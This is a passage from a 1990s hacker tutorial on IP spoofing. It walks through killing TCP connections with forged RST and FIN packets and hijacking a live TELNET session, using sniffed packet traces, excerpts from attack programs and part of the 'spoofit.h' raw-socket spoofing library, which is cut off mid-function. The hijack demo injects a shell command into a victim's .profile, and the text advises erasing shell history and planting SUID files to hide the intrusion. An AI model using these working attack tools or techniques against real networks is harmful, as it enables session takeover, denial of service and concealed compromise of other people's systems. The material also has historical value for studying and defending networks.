solution) 1) connection running... we wait for a packet to get current SEQ/ACK (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A6 ACK (hex): B8BD7679 FLAGS: -AP--- Window: 3400 (data removed because irrelevant, 2 bytes data) 2) This is the ACK of it + included data (witch causes SEQ number to change, and thus messing up our scheme, because this came very fast.) (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7679 ACK (hex): 57E1F2A8 FLAGS: -AP--- Window: 2238 (data removed because irrelevant, 2 bytes data) 3) ACK of it. (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A8 ACK (hex): B8BD767B FLAGS: -A---- Window: 3400 (data removed because irrelevant) 4) further data (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD767B ACK (hex): 57E1F2A8 FLAGS: -AP--- Window: 2238 (data removed because irrelevant) 5) ACK of it (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1810-111.11.11.11.23 SEQ (hex): 57E1F2A8 ACK (hex): B8BD7691 FLAGS: -A---- Window: 3400 6) Now we get 2 RST packets. How do you explain that? Well, the first reset packet has been buffered somewhere on our system, because the ethernet segment was busy when we wanted to send it. This is the 'unexpected thing' I discussed above, here we are lucky, the data stream cooled down so fast. When it doesn't cool down so fast, we could miss our RST (or the connection will be killed a little later then when we wanted), you'll see some idea's on how to fix that problem. TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7679 FLAGS: ---R-- TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1810 SEQ (hex): B8BD7691 FLAGS: ---R-- (This was the packet that killed the connection) Discussion of the program: The discussion here is a bit weird , that is because 'sniper-rst.c' is not designed to be an optimal killer, merly to be an example. We have the problem of speed here. We miss some packets what causes those resends. So we would design a better 'sniper' if we do the following: - use blocking IO (not necessarilly, because the RST killer would loose some of it's beauty (looping), this is dealt with in the FIN killer example. Blocking is a little faster when a lot of packets come after each other.) - multi-packet firing... fire more packets with incremented SEQ. (this is commented in the source) - waiting for a pure ACK packet (no data), because otherwise you risk to much of getting mid transmission and not being fast enough. (disadvantage is the 'waiting period' before the connection is killed) NOTE these examples were done on non-loaded networks, with non-loaded servers, what makes it a worst case scenario for speed problems. 4.3.2 Closing a connection (FIN) -------------------------------- Concept: An other flag is FIN and says: "no more data from sender". This flag is used when closing a connection down the normal legit way. So if there was a way to make a packet that is accepted by one of the two hosts, this host would believe the 'sender' didn't have any data left. Following (real) packets would be ignored as they are considered bogus. That's it, because we can sniff the current SEQ/ACK of the connection we can pretend to be either host A or B, and provide the other host with CORRECT packetinformation, and an evil FIN flag. The beauty of it all is, that after a FIN is send the other host always replies with one if it is accepted, so we have a way to verify our killing, and can be 100% sure of success (if for some reason we missed a SEQ or ACK, we can just resend). RST killing is more popular and is prefered, but I've put this in as an example, and I like it myself. An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) 1) connection is running.... sniper is started on host S as 'sniper-fin 166.66.66.1 23 111.11.11.11 1072' and waits for a packet to take action (we need to get SEQ/ACK) (mind you switching host A and B would be the same, only S would be impersonating A instead of B) suddenly a packet arrives... (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98B ACK (hex): 69C5473E FLAGS: -AP--- Window: 3400 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 45 E 00 . 00 . 2A * 30 0 5E ^ 40 @ 00 . 40 @ 06 . 5E ^ AD . 9D . C1 . 45 E 33 3 9D . C1 . 2B + 0D . 00 . 17 . 04 . 30 0 19 . C6 . B9 . 8B . 69 i C5 . 47 G 3E > 50 P 18 . 34 4 00 . 3A : 61 a 00 . 00 . 0D . 0A . ~~~~~~~~~ > 2 data bytes 2) sniper detected it, and sends a bogus packet. (S as B -> A) We calculate our SEQ as: ACK of (A->B) packet We calculate our ACK as: SEQ of (A->B) packet + datalength of that packet (19C6B98B + 2 = 19C6B98D) (so we tell A, we received the last packet, and will not transmit further data) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23 SEQ (hex): 69C5473E ACK (hex): 19C6B98D FLAGS: -A---F Window: 7C00 (data removed because irrelevant) 3) host A now says: 'okay, you end the session, so here is my last data' (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98D ACK (hex): 69C5473E FLAGS: -AP--- Window: 3400 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B998 ACK (hex): 69C5473F FLAGS: -A---- Window: 3400 (data removed because irrelevant) 4) host A now has flushed its buffer and on his turn FIN's the connection. (A->B) sniper, intercepts this packet and now knows the hosts fell for the spoof and the killing was a success! (host A will no longer accept any data) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B998 ACK (hex): 69C5473F FLAGS: -A---F Window: 3400 (data removed because irrelevant) 5) We impersonated B, making A believe we had no further data. But B doesn't know that and continues to send packets. (B->A) host A has that connection closed, and thus thinks the real packets of B are spoofed (or at least bogus)! So host A sends some reset packets (RST). TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.1072-166.66.66.1.23 SEQ (hex): 69C5473E ACK (hex): 19C6B98D FLAGS: -A---- Window: 3750 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.23-111.11.11.11.1072 SEQ (hex): 19C6B98D FLAGS: ---R-- (data removed because irrelevant) 6) This goes on for a couple of packets. Discussion of the program (numbers correspond with those of 'An Actual Attack'): 1) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10); if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);} We use wait_packet on a non blocking socket. This way we can enable a 10 seconds timeout. This functions returns when the correct packet has been delivered (or timeout). 2) sp_seq=pinfo.ack; sp_ack=pinfo.seq+pinfo.datalen; transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P, sp_seq,sp_ack,ACK|FIN); We calculate a spoofed SEQ/ACK, and fire off a fake FIN packet. As we don't send any data with it, our buffer is set to NULL and datalength to 0. NOTE together with FIN, you need to enable ACK. 3) N/A 4) stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5); if(stat>=0) {printf("Killed the connection...\n"); exit(0);} We wait for a FIN packet (note the FIN in wait_packet). We use a 5 sec. timeout, if the function returns and stat>=0 (-1 on timeout), we know our attempt was successfull. 5) N/A 6) N/A NOTE We can have the same problem here as with the RST killer. But didn't have it here, because the packet we responded upon was the end of a data stream (in fact it was an echo from a shell command) 4.3.3 Improving --------------- Except from multipacket firing, it is advised to launch 2 attacks (one in both ways). This illiminates one side oriented connections to be handled optimally. I think of things like downloading data, which is a one way data-flow, it is much easier sending a RST from the (spoofed) receiver to the sender, then the other way around. Those 2 attacks could both impersonate host A and B, and thus giving is 4 times more chance of a succesfull kill. I'll leave further experimenting up to you (use your imagination to handle different situations). 4.4 Connection Hijacking ------------------------ Setup: host A <------X------------------------->host B | A,B have a TCP connection running (TELNET) host S <------/ A,S on same subnet Concept: (suppose a TELNET from A (client) to B (server)) TCP separates good and bogus packets by their SEQ/ACK numbers i.e. B trusts the packets from A because of its correct SEQ/ACK numbers. So if there was a way to mess up A's SEQ/ACK, B would stop believing A's real packets. We could then impersonate to be A, but using correct SEQ/ACK numbers (that is numbers correct for B). We would now have taken over the connection (host A is confused, B thinks nothings wrong (almost correct, see 'actual attack'), and S sends 'correct' data to B). This is called 'Hijacking' a connection. (generally hijacking a TELNET session, but same could be done woth FTP, RLOGIN, etc...) How could we mess up A's SEQ/ACK numbers? Well by simply inserting a data packet into the stream at the right time (S as A->B), the server B would accept this data, and update ACK numbers, A would continue to send it's old SEQ numbers, as it's unaware of our spoofed data. Use: I allready hear you wiseguys yelling: "Hey dude, why hijack a connection if you can sniff those packets anyway??" Well, anybody heared of One Time Passwords, Secure Key?? Case closed.... (S/Key: server challenges client, client and server calculate a code from the challenge and password, and compare that code. The password itself is never send on the cable, so you can't sniff sh!t). (OTP: server has a list of passwords, once one is used, it is destroyed, so sniffing gets you a password that has 'just' expired ;) (ALL types of identification that happen at connection (encrypted or not, trusted or not), and don't use encrypted data transfer, are vulnerable to 'hijacking'.) An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) (suppose a TELNET from A (client) to B (server)) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) 1) connection running... we look with sniffit, and see he's busy in a shell, we start 'hijack' on host S as 'hijack 166.66.66.1 2035 111.11.11.11' a packet containing from (A->B) is detected... hijack takes action... (A->B) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EA ACK (hex): C34A67F6 FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 45 E 00 . 00 . 29 ) CA . F3 . 40 @ 00 . 40 @ 06 . C5 . 0E . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EA . C3 . 4A J 67 g F6 . 50 P 18 . 7C | 00 . 6D m 29 ) 00 . 00 . 6C l ~~~~ 2) host B (server) echo's that databyte (typing 'l' in a bash shell!!!) (you gotta know what you are doing) (B->A) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A67F6 ACK (hex): 5C8223EB FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 45 E 00 . 00 . 29 ) B5 . BD . 40 @ 00 . FC . 06 . 1E . 44 D 9D . C1 . 2A * 0B . 9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F6 . 5C \ 82 . 23 # EB . 50 P 18 . 22 " 38 8 C6 . F0 . 00 . 00 . 6C l ~~~~ 3) A simple ACK from host A to B responding to that echo. Because we know this can come, and we know a simple ACK doesn't contain data, we don't need this for SEQ/ACK calculation. TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -A---- Window: 7C00 (data removed because irrelevant) 4) Now we impersonate further data (following packet 1). (S as A -> B) We calculate SEQ/ACK out of packet 1, NOT out of the 'echo' from B, because we have to be as fast as possible, and packet 2 could be slow. We send some backspaces and some enters. To clean up the command line. We will probably still get some error message back from the shell. But we handle that too! (see sourcecode) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F6 FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 45 E 00 . 00 . 32 2 31 1 01 . 00 . 00 . 45 E 06 . 99 . F8 . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EB . C3 . 4A J 67 g F6 . 50 P 18 . 7C | 00 . AE . F5 . 00 . 00 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 0A . 0A . 5) This is the echo of our spoofed data. Look at ACK. (B->A) 5C8223F5 = 5C8223EB + 0A (this is how we detect that the spoof was a success) NOTE that at this point the connection is ours, and A's SEQ/ACK numbers are completely f#cked up according to B. TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A67F7 ACK (hex): 5C8223F5 FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 45 E 00 . 00 . 3C < B5 . BE . 40 @ 00 . FC . 06 . 1E . 30 0 9D . C1 . 2A * 0B . 9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F7 . 5C \ 82 . 23 # F5 . 50 P 18 . 22 " 38 8 26 & 7C | 00 . 00 . 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 0D . 0A . 0D . 0A . 6) Hijack will now try to get on track of SEQ/ACK numbers again, to send the data we want to be executed. NOTE each time a packet 'out of numbering' arrives the host should answer with correct SEQ/ACK, this provides us with the certainty that a lot of packets are going to be send with correct (and not changing) SEQ/ACK nrs. (this is where the mechanism of getting our numbers back straight is based upon) NOTE it's at this point the real TELNET client's session hangs, most people ignore this and re-login after a few secs, accepting the accident as Murphy's law. (Well it *can* happen without any spoofing involved) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant) 7) We are back on track (or at least hijack is, because this is going very fast). And we fire off our faked bash command. echo "echo HACKED" >> $HOME/.profile TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223F5 ACK (hex): C34A680B FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23 45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J 68 h 0B . 50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20 22 " 65 e 63 c 68 h 6F o 20 48 H 41 A 43 C 4B K 45 E 44 D 22 " 20 3E > 3E > 24 $ 48 H 4F O 4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e 0A . 00 . 8) now we wait for this data to be confirmed. ACK = 5C8223F5 + 025 (=37 bytes) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C82241A FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040 (data removed because irrelevant) 9) The connection runs on. Now you can execute more commands (just stay on track of SEQ/ACK), and even finnish the connection (with the same mechanism of sniper, or with sniper itself... here FIN is recommended). NOTE: here it is important to be in a shell. But if you have been watching someone, and you notice he's always directly going to 'pine' and you can't get inbetween on time. NO PROBS.... just make a cleanup string that cleans up 'pine' and puts you back in the shell. (some control chars, hotkeys, whatever....) NOTE: if you clean up the .sh_history of .bash_history (whatever) this attack is one of the nicest there is. Another advantage above sniffing. NOTE: Noone says you have to make a .rhosts file (rlogin and family might be disabled), you can change permissions, put stuff SUID, put it public, install stuff, mail, etc.. Discussion of the program (numbers correspond with those of 'An Actual Attack'): 1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); Waiting for actual data (PSH is always used for packets containing data in interactive services like TELNET) 2) N/A 3) N/A 4) sp_seq=attack_info.seq+attack_info.datalen; sp_ack=attack_info.ack; transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER, 23,sp_seq,sp_ack,ACK|PSH); We recalculate the sequence number (using SEQ and datalength of packet 1) an we send a spoofed packet with ACK and PSH flag, containing the cleanup data in to_data. 5) while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; We wait for a confirmation that our spoofed sequence is accepted. We expect a packet with an ACK set (PSH or not). It should come within 5 packets, we use this limit, because we should be able to handle some previous ACK packets! NOTE we don't check SEQ nrs, because we have no clue of what they are going to be (data might have been send our way, or not). 6) while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; To get back on track, we try to receive 2 ACK packets without data with the same SEQ/ACK. We know enough packets will be send as a response to incorrect packets from the confused host A. This is how we get back on track. NOTE In a case where A completely gave up, simple spoof a packet with incorrect SEQ/ACK to get the correct numbers back. 7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); Pretty clear.... 8) while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; and again waiting for confirmation. NOTE after the above attack, hijack had produced the following output: Starting Hijacking demo - Brecht Claerhout 1996 ----------------------------------------------- Takeover phase 1: Stealing connection. Sending Spoofed clean-up data... Waiting for spoof to be confirmed... Phase 1 ended. Takeover phase 2: Getting on track with SEQ/ACK's again Server SEQ: C34A680B (hex) ACK: 5C8223F5 (hex) Phase 2 ended. Takeover phase 3: Sending MY data. Sending evil data. Waiting for evil data to be confirmed... Phase 3 ended. 4.5 Other --------- This list is far from complete, I'm sure you can think of other nice things to do with this information, think, experiment and code! 5. The source code ------------------ ---=[ spoofit.h ]=------------------------------------------------------------ /**************************************************************************/ /* Spoofit.h - Include file for easy creating of spoofed TCP packets */ /* Requires LINUX 1.3.x (or later) Kernel */ /* (illustration for 'A short overview of IP spoofing') */ /* V.1 - Copyright 1996 - Brecht Claerhout */ /* */ /* Purpose - Providing skilled people with a easy to use spoofing source */ /* I used it to be able to write my tools fast and short. */ /* Mind you this is only illustrative and can be easily */ /* optimised. */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This file is for educational purposes only. I am in */ /* NO way responsible for what you do with this file, */ /* or any damage you or this file causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* If you know a little about your OS, shouldn't be to hard */ /* to port. */ /* */ /* Important note - You might have noticed I use non standard packet */ /* header struct's. How come?? Because I started like */ /* that on Sniffit because I wanted to do the */ /* bittransforms myself. */ /* Well I got so damned used to them, I keep using them, */ /* they are not very different, and not hard to use, so */ /* you'll easily use my struct's without any problem, */ /* this code and the examples show how to use them. */ /* my apologies for this inconvenience. */ /* */ /* None of this code can be used in commercial software. You are free to */ /* use it in any other non-commercial software (modified or not) as long */ /* as you give me the credits for it. You can spread this include file, */ /* but keep it unmodified. */ /* */ /**************************************************************************/ /* */ /* Easiest way to understand this library is to look at the use of it, in */ /* the example progs. */ /* */ /**** Sending packets *****************************************************/ /* */ /* int open_sending (void) */ /* Returns a filedescriptor to the sending socket. */ /* close it with close (int filedesc) */ /* */ /* void transmit_TCP (int sp_fd, char *sp_data, */ /* int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, */ /* char *sp_source, unsigned short sp_source_port, */ /* char *sp_dest,unsigned short sp_dest_port, */ /* unsigned long sp_seq, unsigned long sp_ack, */ /* unsigned short sp_flags) */ /* fire data away in a TCP packet */ /* sp_fd : raw socket filedesc. */ /* sp_data : IP options (you should do the padding) */ /* TCP options (you should do the padding) */ /* data to be transmitted */ /* (NULL is nothing) */ /* note that all is optional, and IP en TCP options are*/ /* not often used. */ /* All data is put after eachother in one buffer. */ /* sp_ipoptlen : length of IP options (in bytes) */ /* sp_tcpoptlen : length of TCP options (in bytes) */ /* sp_datalen : amount of data to be transmitted (bytes) */ /* sp_source : spoofed host that"sends packet" */ /* sp_source_port: spoofed port that "sends packet" */ /* sp_dest : host that should receive packet */ /* sp_dest_port : port that should receive packet */ /* sp_seq : sequence number of packet */ /* sp_ack : ACK of packet */ /* sp_flags : flags of packet (URG,ACK,PSH,RST,SYN,FIN) */ /* */ /* void transmit_UDP (int sp_fd, char *sp_data, */ /* int sp_ipoptlen, int sp_datalen, */ /* char *sp_source, unsigned short sp_source_port, */ /* char *sp_dest, unsigned short sp_dest_port) */ /* fire data away in an UDP packet */ /* sp_fd : raw socket filedesc. */ /* sp_data : IP options */ /* data to be transmitted */ /* (NULL if none) */ /* sp_ipoptlen : length of IP options (in bytes) */ /* sp_datalen : amount of data to be transmitted */ /* sp_source : spoofed host that"sends packet" */ /* sp_source_port: spoofed port that "sends packet" */ /* sp_dest : host that should receive packet */ /* sp_dest_port : port that should receive packet */ /* */ /**** Receiving packets ***************************************************/ /* */ /* int open_receiving (char *rc_device, char mode) */ /* Returns fdesc to a receiving socket */ /* (if mode: IO_HANDLE don't call this twice, global var */ /* rc_fd_abc123 is initialised) */ /* rc_device: the device to use e.g. "eth0", "ppp0" */ /* be sure to change DEV_PREFIX accordingly! */ /* DEV_PREFIX is the length in bytes of the header that */ /* comes with a SOCKET_PACKET due to the network device */ /* mode: 0: normal mode, blocking, (read will wait till packet */ /* comes, mind you, we are in PROMISC mode) */ /* IO_NONBLOCK: non-blocking mode (read will not wait till */ /* usefull for active polling) */ /* IO_HANDLE installs the signal handler that updates SEQ,ACK,..*/ /* (IO_HANDLE is not recommended to use, as it should be */ /* modified according to own use, and it works bad on heavy */ /* traffic continuous monitoring. I needed it once, but left it */ /* in to make you able to have a look at Signal handled IO, */ /* personally I would have removed it, but some thought it */ /* doesn't do any harm anyway, so why remove... ) */ /* (I'm not giving any more info on IO_HANDLE as it is not */ /* needed for the example programs, and interested people can */ /* easilythey figure the code out theirselves.) */ /* (Besides IO_HANDLE can only be called ONCE in a program, */ /* other modes multiple times) */ /* */ /* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start, */ /* unsigned char *proto) */ /* This waits for a packet (mode default) and puts it in buffer or */ /* returns whether there is a pack or not (IO_NONBLOCK). */ /* It returns the packet length if there is one available, else 0 */ /* */ /* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, */ /* char *wp_source, unsigned short wp_source_port, */ /* char *wp_dest, unsigned short wp_dest_port, */ /* int wp_flags, int wait_time); */ /* wp_fd: a receiving socket (default or IO_NONBLOCK) */ /* ret_values: pointer to a sp_wait_packet struct, that contains SEQ, */ /* ACK, flags, datalen of that packet. For further packet */ /* handling see the examples. */ /* struct sp_wait_packet { */ /* unsigned long seq,ack; */ /* unsigned short flags; */ /* int datalen; */ /* }; */ /* wp_source, wp_source_port : sender of packet */ /* wp_dest, wp_dest_port : receiver of packet */ /* wp_flags: flags that should be present in packet.. (mind you there */ /* could be more present, so check on return) */ /* note: if you don't care about flag, use 0 */ /* wait_time: if not zero, this function will return -1 if no correct */ /* packet has arrived within wait_time secs. */ /* (only works on IO_NONBLOCK socket) */ /* */ /* void set_filter (char *f_source, unsigned short f_source_port, */ /* char *f_dest, unsigned short f_dest_port) */ /* (for use with IO_HANDLE) */ /* Start the program to watch all trafic from source/port to */ /* dest/port. This enables the updating of global data. Can */ /* be called multiple times. */ /* */ /* void close_receiving (void) */ /* When opened a IO_HANDLE mode receiving socket close it with */ /* this. */ /* */ /**** Global DATA (IO_HANDLE mode) ****************************************/ /* */ /* When accessing global data, copy the values to local vars and then use */ /* them. Reduce access time to a minimum. */ /* Mind you use of this is very limited, if you are a novice on IO, just */ /* ignore it, the other functions are good enough!). If not, rewrite the */ /* handler for your own use... */ /* */ /* sig_atomic_t SP_DATA_BUSY */ /* Put this on NON-ZERO when accesing global data. Incoming */ /* packets will be ignored then, data can not be overwritten. */ /* */ /* unsigned long int CUR_SEQ, CUR_ACK; */ /* Last recorded SEQ and ACK number of the filtered "stream". */ /* Before accessing this data set SP_DATA_BUSY non-zero, */ /* afterward set it back to zero. */ /* */ /* unsigned long int CUR_COUNT; */ /* increased everytime other data is updated */ /* */ /* unsigned int CUR_DATALEN; */ /* Length of date in last TCP packet */ /* */ /**************************************************************************/ #include "sys/socket.h" /* includes, what would we do without them */ #include "netdb.h" #include "stdlib.h" #include "unistd.h" #include "stdio.h" #include "errno.h" #include "netinet/in.h" #include "netinet/ip.h" #include "linux/if.h" #include "sys/ioctl.h" #include "sys/types.h" #include "signal.h" #include "fcntl.h" #undef DEBUG #define IP_VERSION 4 /* keep y'r hands off... */ #define MTU 1500 #define IP_HEAD_BASE 20 /* using fixed lengths to send */ #define TCP_HEAD_BASE 20 /* no options etc... */ #define UDP_HEAD_BASE 8 /* Always fixed */ #define IO_HANDLE 1 #define IO_NONBLOCK 2 int DEV_PREFIX = 9999; sig_atomic_t WAIT_PACKET_WAIT_TIME=0; /**** IO_HANDLE ************************************************************/ int rc_fd_abc123; sig_atomic_t RC_FILTSET=0; char rc_filter_string[50]; /* x.x.x.x.p-y.y.y.y.g */ sig_atomic_t SP_DATA_BUSY=0; unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0; unsigned int CUR_DATALEN; unsigned short CUR_FLAGS; /***************************************************************************/ struct sp_wait_packet { unsigned long seq,ack; unsigned short flags; int datalen; }; /* Code from Sniffit - BTW my own program.... no copyright violation here */ #define URG 32 /* TCP flags */ #define ACK 16 #define PSH 8 #define RST 4 #define SYN 2 #define FIN 1 struct PACKET_info { int len, datalen; unsigned long int seq_nr, ACK_nr; u_char FLAGS; }; struct IP_header /* The IPheader (without options) */ { unsigned char verlen, type; unsigned short length, ID, flag_offset; unsigned char TTL, protocol; unsigned short checksum; unsigned long int source, destination; }; struct TCP_header /* The TCP header (without options) */ { unsigned short source, destination; unsigned long int seq_nr, ACK_nr; unsigned short offset_flag, window, checksum, urgent; }; struct UDP_header /* The UDP header */ { unsigned short source, destination; unsigned short length, checksum; }; struct pseudo_IP_header /* The pseudo IP header (checksum calc) */ { unsigned long int source, destination; char zero_byte, protocol; unsigned short TCP_UDP_len; }; /* data structure for argument passing */ struct sp_data_exchange { int fd; /* Sh!t from transmit_TCP */ char *data; int datalen; char *source; unsigned short source_port; char *dest; unsigned short dest_port; unsigned long seq, ack; unsigned short flags; char *buffer; /* work buffer */ int IP_optlen; /* IP options length in bytes */ int TCP_optlen; /* TCP options length in bytes */ }; /**************** all functions *******************************************/ void transmit_TCP (int fd, char *sp_data, int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port, unsigned long sp_seq, unsigned long sp_ack, unsigned short sp_flags); void transmit_UDP (int sp_fd, char *sp_data, int ipoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port); int get_packet (int rc_fd, char *buffer, int *, unsigned char*); int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *, unsigned short, int, int); static unsigned long sp_getaddrbyname(char *); int open_sending (void); int open_receiving (char *, char); void close_receiving (void); void sp_send_packet (struct sp_data_exchange *, unsigned char); void sp_fix_TCP_packet (struct sp_data_exchange *); void sp_fix_UDP_packet (struct sp_data_exchange *); void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char); unsigned short in_cksum(unsigned short *, int ); void rc_sigio (int); void set_filter (char *, unsigned short, char *, unsigned short); /********************* let the games commence ****************************/ static unsigned long sp_getaddrbyname(char *sp_name) { struct hostent *sp_he; int i; if(isdigit(*sp_name)) return inet_addr(sp_name); for(i=0;i<100;i++) { if(!(sp_he = gethostbyname(sp_name))) {printf("WARNING: gethostbyname failure!\n"); sleep(1); if(i>=3) /* always a retry here in this kind of application */ printf("Coudn't resolv hostname."), exit(1); } else break; } return sp_he ? *(long*)*sp_he->h_addr_list : 0; } int open_sending (void) { struct protoent *sp_proto; int sp_fd; int dummy=1; /* they don't come rawer */ if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1) perror("Couldn't open Socket."), exit(1); #ifdef DEBUG printf("Raw socket ready\n"); #endif return sp_fd; } void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto) { int sp_status; struct sockaddr_in sp_server; struct hostent *sp_help; int HEAD_BASE; /* Construction of destination */ bzero((char *)&sp_server, sizeof(struct sockaddr)); sp_server.sin_family = AF_INET; sp_server.sin_addr.s_addr = inet_addr(sp->dest); if (sp_server.sin_addr.s_addr == (unsigned int)-1) { /* if target not in DOT/number notation */ if (!(sp_help=gethostbyname(sp->dest))) fprintf(stderr,"unknown host %s\n", sp->dest), exit(1); bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length); }; switch(proto) { case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */ case 17: HEAD_BASE = UDP_HEAD_BASE; break; /* UDP */ default: exit(1); break; }; sp_status = 